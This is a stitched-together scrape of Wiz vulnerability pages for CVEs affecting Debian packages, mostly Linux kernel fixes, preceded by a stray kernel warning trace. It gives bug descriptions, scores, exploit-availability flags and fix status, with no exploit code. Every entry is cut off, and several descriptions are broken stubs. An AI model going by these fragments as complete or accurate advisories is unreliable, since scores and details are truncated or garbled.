WARNING: CPU: 3 PID: 2040 at drivers/gpu/drm/msm/msm_gem.c:1127 msm_gem_free_object+0x1f8/0x264 [msm]
CPU: 3 UID: 1000 PID: 2040 Comm: .gnome-shell-wr Not tainted 6.17.0-rc7 #1 PREEMPT
pstate: 81400005 (Nzcv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)
pc : msm_gem_free_object+0x1f8/0x264 [msm]
lr : msm_gem_free_object+0x138/0x264 [msm]
sp : ffff800092a1bb30
x29: ffff
Wiz
CVE-2025-61635 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-61635 [MEDIUM] CVE-2025-61635 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-61635 :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation ConfirmEdit. This vulnerability is associated with program files includes/FancyCaptcha/ApiFancyCaptchaReload.Php.
This issue affects ConfirmEdit: *.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Oct 03, 2025
Echo Has Fix Added at: Nov 18, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can foc
Wiz
CVE-2025-68754 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68754 [MEDIUM] CVE-2025-68754 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68754 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
rtc: amlogic-a4: fix double free caused by devm
The clock obtained via devm_clk_get_enabled() is automatically managed
by devres and will be disabled and freed on driver detach. Manually
calling clk_disable_unprepare() in error path and remove function
causes double free.
Remove the redundant clk_disable_unprepare() calls from the probe
error path and aml_rtc_remove(), allowing the devm framework to
automatically manage the clock lifecycle.
Source : NVD
Published January 5, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Explo
Wiz
CVE-2026-23218 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-23218 [MEDIUM] CVE-2026-23218 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23218 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
gpio: loongson-64bit: Fix incorrect NULL check after devm_kcalloc()
Fix incorrect NULL check in loongson_gpio_init_irqchip().
The function checks chip->parent instead of chip->irq.parents.
Source : NVD
## 5.5
Score
Published February 18, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-fips
linux-azure-fips
Sources
NVD
Debian 14 Severity MEDIUM Has Fix Added at: Feb 19, 2026
Ub
Wiz
CVE-2025-52534 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-52534 [MEDIUM] CVE-2025-52534 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-52534 :
Linux Debian vulnerability analysis and mitigation
Improper bound check within AMD CPU microcode can allow a malicious guest to write to host memory, potentially resulting in loss of integrity.
Source : NVD
## 5.3
Score
Published February 10, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 29.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
amd64-microcode
Sources
NVD
Debian 11 No Fix Added at: Feb 11, 2026
Echo No Fix Added at: Feb 11, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not ju
Wiz
CVE-2025-67858 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.0
CVE-2025-67858 [HIGH] CVE-2025-67858 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67858 :
Linux Debian vulnerability analysis and mitigation
nft
Source : NVD
## 7
Score
Published January 8, 2026
Severity HIGH
CNA Score 7.0
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
foomuuri
foomuuri-firewalld
Sources
NVD
Debian 13, 14 Has Fix Added at: Jan 08, 2026
Echo Has Fix Added at: Jan 08, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Linux Debian vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
C
Wiz
CVE-2026-23341 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23341 [MEDIUM] CVE-2026-23341 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23341 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
accel/amdxdna: Fix crash when destroying a suspended hardware context
If userspace issues an ioctl to destroy a hardware context that has
already been automatically suspended, the driver may crash because the
mailbox channel pointer is NULL for the suspended context.
Fix this by checking the mailbox channel pointer in aie2_destroy_context()
before accessing it.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.5
Exploitation Probability (EPSS) N/A
Affected package
Wiz
CVE-2026-5185 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-5185 [MEDIUM] CVE-2026-5185 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5185 :
Linux Debian vulnerability analysis and mitigation
A security flaw has been discovered in Nothings stb_image up to 2.30. This affects the function stbi__gif_load_next of the file stb_image.h of the component Multi-frame GIF File Handler. The manipulation results in heap-based buffer overflow. The attack requires a local approach. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 4.8
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.2
Exploitati
Wiz
CVE-2025-71155 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-71155 [HIGH] CVE-2025-71155 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71155 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: Fix gmap_helper_zap_one_page() again
A few checks were missing in gmap_helper_zap_one_page(), which can lead
to memory corruption in the guest under specific circumstances.
Add the missing checks.
Source : NVD
## 7.8
Score
Published January 23, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-gcp
linux-gcp-6.17
Sources
NVD
Debian 14 Severity HIGH Has Fix Added at: Jan 23, 20
Wiz
CVE-2026-23029 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23029 [MEDIUM] CVE-2026-23029 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23029 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
LoongArch: KVM: Fix kvm_device leak in kvm_eiointc_destroy()
In kvm_ioctl_create_device(), kvm_device has allocated memory,
kvm_device->destroy() seems to be supposed to free its kvm_device
struct, but kvm_eiointc_destroy() is not currently doing this, that
would lead to a memory leak.
So, fix it.
Source : NVD
Published January 31, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-lowlatency-hwe-6.8
linux-
Wiz
CVE-2026-23433 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23433 [MEDIUM] CVE-2026-23433 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23433 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
arm_mpam: Fix null pointer dereference when restoring bandwidth counters
When an MSC supporting memory bandwidth monitoring is brought offline and
then online, mpam_restore_mbwu_state() calls __ris_msmon_read() via ipi to
restore the configuration of the bandwidth counters. It doesn't care about
the value read, mbwu_arg.val, and doesn't set it leading to a null pointer
dereference when __ris_msmon_read() adds to it. This results in a kernel
oops with a call trace such as:
Call trace:
__ris_msmon_read+0x19c/0x64c (P)
mpam_restore_mbwu_state+0xa0/0xe8
smp_call_on_cpu_callback+0x1c/0x38
process_one_work+0x154/0x4b4
worker_thread+0x188/0x310
kthread+0x
Wiz
CVE-2025-71228 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-71228 [MEDIUM] CVE-2025-71228 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71228 :
Linux Debian vulnerability analysis and mitigation
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Source : NVD
## 8.4
Score
Published February 18, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-gcp-4.15
linux-gcp-fips
Sources
NVD
Debian 11, 12 No Fix Added at: Feb 19, 2026
Debian 13, 14 Has Fix Added at: Feb 19, 2026
Echo Has Fix Added at: Feb 19, 2026
Ubuntu 16.04, 18.04, 20.04 Severity MEDIUM No Fix Added at: Feb 19, 2026
Ubuntu 22.04, 24.04, 25.10 Se
Wiz
CVE-2025-71181 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2025-71181 [MEDIUM] CVE-2025-71181 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71181 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
rust_binder: remove spin_lock() in rust_shrink_free_page()
When forward-porting Rust Binder to 6.18, I neglected to take commit
fb56fdf8b9a2 ("mm/list_lru: split the lock to per-cgroup scope") into
account, and apparently I did not end up running the shrinker callback
when I sanity tested the driver before submission. This leads to crashes
like the following:
WARNING: possible recursive locking detected
6.18.0-mainline-maybe-dirty #1 Tainted: G IO
kswapd0/68 is trying to acquire lock:
ffff956000fa18b0 (&l->lock){+.+.}-{2:2}, at: lock_list_lru_of_memcg+0x128/0x230
but task is already holding lock:
ffff956000fa18b0 (&l->lock){+.+.}-{2:2}, at: rust_h
Wiz
CVE-2025-69654 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-69654 [HIGH] CVE-2025-69654 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69654 :
Linux Debian vulnerability analysis and mitigation
qjs
-m
Source : NVD
## 7.5
Score
Published March 6, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
quickjs
Sources
NVD
Debian 13 Severity MEDIUM No Fix Added at: Mar 10, 2026
Debian 14 Severity HIGH No Fix Added at: Mar 10, 2026
Echo Severity HIGH No Fix Added at: Mar 10, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Linux Debian vulnerabilities:
C
Wiz
CVE-2026-22995 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-22995 [HIGH] CVE-2026-22995 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22995 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ublk: fix use-after-free in ublk_partition_scan_work
A race condition exists between the async partition scan work and device
teardown that can lead to a use-after-free of ub->ub_disk:
ublk_ctrl_start_dev() schedules partition_scan_work after add_disk()
del_gendisk(ub->ub_disk)
ublk_detach_disk() sets ub->ub_disk = NULL
put_disk() which may free the disk
The worker ublk_partition_scan_work() then dereferences ub->ub_disk leading to UAF
Fix this by using ublk_get_disk()/ublk_put_disk() in the worker to hold
a reference to the disk during the partition scan. The spinlock in
ublk_get_disk() synchronizes with ublk_detach_disk() ensuring the worker
Wiz
CVE-2026-23226 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-23226 [HIGH] CVE-2026-23226 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23226 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: add chann_lock to protect ksmbd_chann_list xarray
ksmbd_chann_list xarray lacks synchronization, allowing use-after-free in
multi-channel sessions (between lookup_chann_list() and ksmbd_chann_del).
Adds rw_semaphore chann_lock to struct ksmbd_session and protects
all xa_load/xa_store/xa_erase accesses.
Source : NVD
## 7.8
Score
Published February 18, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.7
Exploitation Probability (EPSS) N/A
Affected packages an
Wiz
CVE-2026-3949 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-3949 [MEDIUM] CVE-2026-3949 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3949 :
Linux Debian vulnerability analysis and mitigation
A vulnerability was determined in strukturag libheif up to 1.21.2. This affects the function vvdec_push_data2 of the file libheif/plugins/decoder_vvdec.cc of the component HEIF File Parser. Executing a manipulation of the argument size can lead to out-of-bounds read. The attack needs to be launched locally. The exploit has been publicly disclosed and may be utilized. This patch is called b97c8b5f198b27f375127cd597a35f2113544d03. It is advisable to implement a patch to correct this issue.
Source : NVD
## 4.8
Score
Published March 11, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Amazon Linux
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date
Wiz
CVE-2025-71063 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2025-71063 [HIGH] CVE-2025-71063 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71063 :
Linux Debian vulnerability analysis and mitigation
Errands before 46.2.10 does not verify TLS certificates for CalDAV servers.
Source : NVD
## 7.5
Score
Published January 12, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
errands
Sources
NVD
Debian 13 Severity MEDIUM No Fix Added at: Jan 13, 2026
Debian 14 Severity HIGH Has Fix Added at: Jan 13, 2026
Echo Severity HIGH No Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable,
Wiz
CVE-2025-48514 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.0
CVE-2025-48514 [MEDIUM] CVE-2025-48514 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-48514 :
Linux Debian vulnerability analysis and mitigation
Insufficient Granularity of Access Control in SEV firmware can allow a privileged attacker to create a SEV-ES Guest to attack SNP guest, potentially resulting in a loss of confidentiality.
Source : NVD
## 4
Score
Published February 10, 2026
Severity MEDIUM
CNA Score 4.0
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
amd64-microcode
Sources
NVD
Debian 11 No Fix Added at: Feb 11, 2026
Echo No Fix Added at: Feb 11, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so
Wiz
CVE-2026-5316 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-5316 [MEDIUM] CVE-2026-5316 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5316 :
Linux Debian vulnerability analysis and mitigation
A vulnerability was identified in Nothings stb up to 1.22. The impacted element is the function setup_free of the file stb_vorbis.c. The manipulation leads to allocation of resources. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 5.3
Score
Published April 2, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libstb
Wiz
CVE-2026-5122 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-5122 [MEDIUM] CVE-2026-5122 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5122 :
Linux Debian vulnerability analysis and mitigation
A security flaw has been discovered in osrg GoBGP up to 4.3.0. This affects the function DecodeFromBytes of the file pkg/packet/bgp/bgp.go of the component BGP OPEN Message Handler. Performing a manipulation of the argument domainNameLen results in improper access controls. The attack may be initiated remotely. A high degree of complexity is needed for the attack. The exploitability is reported as difficult. The patch is named 2b09db390a3d455808363c53e409afe6b1b86d2d. It is suggested to install a patch to address this issue.
Source : NVD
## 6.3
Score
Published March 30, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release
Wiz
CVE-2026-27854 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-27854 [MEDIUM] CVE-2026-27854 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27854 :
Linux Debian vulnerability analysis and mitigation
An attacker might be able to trigger a use-after-free by sending crafted DNS queries to a DNSdist using the DNSQuestion:getEDNSOptions method in custom Lua code. In some cases DNSQuestion:getEDNSOptions might refer to a version of the DNS packet that has been modified, thus triggering a use-after-free and potentially a crash resulting in denial of service.
Source : NVD
## 4.8
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
dnsdist
Sources
N
Wiz
CVE-2025-66002 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2025-66002 [MEDIUM] CVE-2025-66002 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66002 :
Linux Debian vulnerability analysis and mitigation
An Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability allows local users ton perform arbitrary unmounts via smb4k mount helper
Source : NVD
## 6.9
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
smb4k
Sources
NVD
Debian 11, 12 No Fix Added at: Dec 11, 2025
Debian 13, 14 Has Fix Added at: Dec 11, 2025
Echo Has Fix Added at: Dec 11, 2025
## Get a CVE risk assessment
Get a prioritized view
Wiz
CVE-2026-23422 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23422 [MEDIUM] CVE-2026-23422 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23422 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
dpaa2-switch: Fix interrupt storm after receiving bad if_id in IRQ handler
Commit 31a7a0bbeb00 ("dpaa2-switch: add bounds check for if_id in IRQ
handler") introduces a range check for if_id to avoid an out-of-bounds
access. If an out-of-bounds if_id is detected, the interrupt status is
not cleared. This may result in an interrupt storm.
Clear the interrupt status after detecting an out-of-bounds if_id to avoid
the problem.
Found by an experimental AI code review agent at Google.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release
Wiz
CVE-2025-68322 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2025-68322 CVE-2025-68322 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68322 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
parisc: Avoid crash due to unaligned access in unwinder
Guenter Roeck reported this kernel crash on his emulated B160L machine:
Starting network: udhcpc: started, v1.36.1
Backtrace:
[] unwind_once+0x1c/0x5c
[] walk_stackframe.isra.0+0x74/0xb8
[] arch_stack_walk+0x28/0x38
[] stack_trace_save+0x48/0x5c
[] set_track_prepare+0x44/0x6c
[] ___slab_alloc+0xfc4/0x1024
[] __slab_alloc.isra.0+0x58/0x90
[] kmem_cache_alloc_noprof+0x2ac/0x4a0
[] __anon_vma_prepare+0x60/0x280
[] __vmf_anon_prepare+0x68/0x94
[] do_wp_page+0x8cc/0xf10
[] handle_mm_fault+0x6c0/0xf08
[] do_page_fault+0x110/0x440
[] handle_interruption+0x184/0x748
[] schedule+0x4c/0x190
BUG: spinloc
Wiz
CVE-2026-34353 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.9
CVE-2026-34353 [MEDIUM] CVE-2026-34353 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34353 :
Linux Debian vulnerability analysis and mitigation
In OCaml through 4.14.3, Bigarray.reshape allows an integer overflow, and resultant reading of arbitrary memory, when untrusted data is processed.
Source : NVD
## 5.9
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.9
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
ocaml-docs
ocaml-emacs
Sources
NVD
Debian 11, 12 Severity MEDIUM No Fix Added at: Mar 29, 2026
Debian 13, 14 Severity MEDIUM Has Fix Added at: Mar 29, 2026
Echo Severity MEDIUM Has Fix Added at: Mar 29, 2026
Red Hat
Wiz
CVE-2025-61652 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.7
CVE-2025-61652 [LOW] CVE-2025-61652 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-61652 :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation DiscussionTools.This issue affects DiscussionTools: from * before 1.43.4, 1.44.1.
Source : NVD
## 2.7
Score
Published February 3, 2026
Severity LOW
CNA Score 2.7
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 28.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mediawiki
Sources
NVD
Debian 13, 14 Has Fix Added at: Oct 03, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Linux Debian vulnerabilities:
CVE ID
Wiz
CVE-2026-2050 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-2050 [MEDIUM] CVE-2026-2050 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2050 :
Linux Debian vulnerability analysis and mitigation
[ZDI-CAN-28266: New Vulnerability Report at rgbe.c]
Source : NVD
Published February 17, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Amazon Linux
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
gegl-debuginfo
gegl-devel
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Feb 16, 2026
Echo Has Fix Added at: Feb 16, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Linux Debian vulnerabilities:
CVE ID
Severity
Score
Techno
Wiz
CVE-2025-68318 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68318 [MEDIUM] CVE-2025-68318 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68318 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
clk: thead: th1520-ap: set all AXI clocks to CLK_IS_CRITICAL
The AXI crossbar of TH1520 has no proper timeout handling, which means
gating AXI clocks can easily lead to bus timeout and thus system hang.
Set all AXI clock gates to CLK_IS_CRITICAL. All these clock gates are
ungated by default on system reset.
In addition, convert all current CLK_IGNORE_UNUSED usage to
CLK_IS_CRITICAL to prevent unwanted clock gating.
Source : NVD
## 5.5
Score
Published December 16, 2025
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date
Wiz
CVE-2026-23428 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-23428 CVE-2026-23428 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23428 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix use-after-free of share_conf in compound request
smb2_get_ksmbd_tcon() reuses work->tcon in compound requests without
validating tcon->t_state. ksmbd_tree_conn_lookup() checks t_state ==
TREE_CONNECTED on the initial lookup path, but the compound reuse path
bypasses this check entirely.
If a prior command in the compound (SMB2_TREE_DISCONNECT) sets t_state
to TREE_DISCONNECTED and frees share_conf via ksmbd_share_config_put(),
subsequent commands dereference the freed share_conf through
work->tcon->share_conf.
KASAN report:
[ 4.144653] ==================================================================
[ 4.145059] BUG: KASAN: slab-use-a
Wiz
CVE-2026-2245 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-2245 [MEDIUM] CVE-2026-2245 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2245 :
Linux Debian vulnerability analysis and mitigation
A vulnerability was identified in CCExtractor up to 183. This affects the function parse_PAT/parse_PMT in the library src/lib_ccx/ts_tables.c of the component MPEG-TS File Parser. Such manipulation leads to out-of-bounds read. The attack can only be performed from a local environment. The exploit is publicly available and might be used. The name of the patch is fd7271bae238ccb3ae8a71304ea64f0886324925. It is best practice to apply a patch to resolve this issue.
Source : NVD
## 4.8
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentil
Wiz
CVE-2026-23426 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23426 [MEDIUM] CVE-2026-23426 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23426 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/logicvc: Fix device node reference leak in logicvc_drm_config_parse()
The logicvc_drm_config_parse() function calls of_get_child_by_name() to
find the "layers" node but fails to release the reference, leading to a
device node reference leak.
Fix this by using the __free(device_node) cleanup attribute to automatic
release the reference when the variable goes out of scope.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.6
Exploitation Probability (
Wiz
CVE-2026-23410 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-23410 [HIGH] CVE-2026-23410 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23410 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix race on rawdata dereference
There is a race condition that leads to a use-after-free situation:
because the rawdata inodes are not refcounted, an attacker can start
open()ing one of the rawdata files, and at the same time remove the
